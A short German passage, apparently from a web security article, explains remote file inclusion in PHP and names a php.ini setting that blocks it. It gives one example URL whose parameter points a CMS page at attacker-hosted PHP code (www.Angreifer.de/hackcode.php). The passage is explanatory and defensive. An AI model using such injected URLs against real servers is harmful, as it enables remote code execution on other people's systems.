Manipuliert ein Angreifer die URL und lässt sie auf PHP-Code zeigen, der auf einem externen Webserver liegt, lädt der angegriffene Server diesen Code, bindet ihn an passender Stelle ein und führt ihn aus. Abbildung 5 zeigt den Ablauf. Die manipulierte URL enthält die Adresse des Angreifer-Servers:http://www.Server.de/cms/index.php?id=http://www.Angreifer.de/hackcode.phpEin weiterer Parameter in der Konfigurationsdatei »php.ini« schafft Abhilfe:allow_url_fopen_=no